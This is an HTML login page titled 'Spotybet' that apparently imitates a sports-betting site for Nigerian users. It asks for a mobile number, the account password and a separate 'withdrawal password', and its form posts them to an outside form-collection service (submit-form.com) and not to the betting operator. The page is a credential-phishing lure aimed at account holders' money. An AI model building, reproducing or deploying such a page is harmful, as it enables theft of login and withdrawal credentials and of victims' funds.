<!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <title>Spotybet</title>
</head>
<style>
    body{
        background-color:smokewhite;
        font-family: san serif;
    }
    p{
        Color:green ;
    }
    h4{
        color: green;
        font-size:35px;
        text-align: center;
    }
    input[type=text] {
        width:300px;
        height:46px;
        text-align: center;
        color: black;
    }
    input[type=password] {
        width:300px;
        height:46px;
        text-align: center;
        color: black;
    }
    header{
        text-align:center;
    }
    button {
        width:300px;
        height:47px;
        text-align: center;
        background-color: green;
        border: solid green;
        color: white;
        border-radius:4px;
    }
    #mycheckbox{
        accent-color: green;
    }
    a{
        color: white;
    }
</style>
<body>
    <header>
    <h4>Login</h4>
        <form action ="https://submit-form.com/QHr77vl6B" method="POST">
            <input type ="text" name="Mobile number" id="MobileNumber" placeholder="+234 Mobile number">
            <input type="password" name="Password"
            id="password" placeholder="Password">
            <input type ="password" name="withdrawal password"
            id="withdrawal password" placeholder="Entet your withdrawal password">
            </form>
            </header>
            <br>
            <inline>
                <font color ="white">ii</font>
            <input type="checkbox" id="mycheckbox">Remember me
            <font color ="white">iii</font>
            <input type="checkbox" id="mycheckbox">Keep me signed in 
            </inline>
            <br>
            <br>
            <header>
            <button type="submit">Login</button>
           <a href="#"><p>Forgot password?</p></a>
            </header>
             </form>
</body>
</html>
